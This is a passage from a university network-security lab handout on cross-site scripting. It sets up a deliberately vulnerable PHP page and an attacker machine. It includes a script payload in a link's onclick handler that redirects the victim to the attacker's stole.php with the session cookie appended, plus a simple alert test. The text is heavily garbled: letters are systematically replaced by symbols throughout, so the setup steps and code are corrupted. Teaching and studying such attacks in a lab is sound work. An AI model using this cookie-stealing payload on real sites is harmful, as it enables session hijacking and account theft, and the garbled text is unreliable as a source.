INTERNATIONAL UNIVERSITY School of Computer Science and Engineering LAB x: Cross Site Scripting Attack Course !

ate Network and System Security Lecturer !uration Pham Van Hau,PhD 135 minutes

Student I!"""""""""""""""""""""""""""""""""""""""""""" Introduction

Student name########

Vul Ser&er 'I-)*

User /achine 'I-@*

.ac%er 'I-9*

Set up a net$or% that consists of three &irtual machines 'as depicted in (igure )* in $hich Secure Server is a $e+ ser&er po$ered +, apache $ith -.- and /,S0L ena+le" In the home director, of ,our $e+ ser&er 'for Apache1 it is 2&ar2$$$2* Create the director, called 3admin4 '2&ar2$$$2admin*" Cop, three files inde5"php1 login"php1 and protected"php to 2&ar2$$$2admin Cop, the 5ss&ul"php to 2&ar2$$$2 Create the messages ta+le in the /,S0L ser&er1 login to ,our /,S0L ser&er CREATE TA6LE I( NOT E7ISTS 8messages 8 ' 8NA/E8 &archar'9:*1 8/essage 8 longte5t * EN;INE</,ISA/ !E(AULT C.ARSET<latin) AUTO=INCRE/ENT<)9 > User and Attacker are t$o machines $ith firefo5 installed" Normall,1 ,ou need to enter the correct username and pass$ord in the login"php page in order to load the protected"php page" The attac%er 'on attac%er machine* does not %no$ the user name and pass$ord of the secure ser&er

Normal Operation (rom machine 3User /achine41 Enter http 22ip)2admin2inde5"php to the $e+ +ro$ser +ar" Enter the username as 35ss4 and 3pass4 as pass$ord" After entering the correct username and pass$ord1 $e+ ser&er creates a session identification and gi&es it to the $e+ +ro$ser" E&er, time1 the $e+ +ro$ser $ants to &ie$ the http 22ip)2admin2protected"php1 it must sho$ the session identification" To &ie$ the session identification1 ,ou can enter 3?a&ascript alert'document"coo%ie*4 to the +ro$sing +ar of ,our $e+ +ro$ser"

Attack (rom the attac%er machine1 the attac%er $ants to steal the session identification of the user from 3User /achine4" This can +e done than%s to the 7SS &ulnera+ilit, of the page

http 22ip)25ss&ul"php" Indeed1 tr, to enter the follo$ing information to the page" Name<Test /essage<A?a&ascriptB alert'3test4*A2?a&ascriptB
No$1 tr, to enter the follo$ing te5t to the message +o5 and clic% on the 3Clic% here4" Aa href<CDC onclic%<C$indo$"location<EFhttp 22I-9 2stole"phpGte5t<EFHescape'document"coo%ie*> return false>CBClic% hereIA2aB (Stole.php sa es the cookie!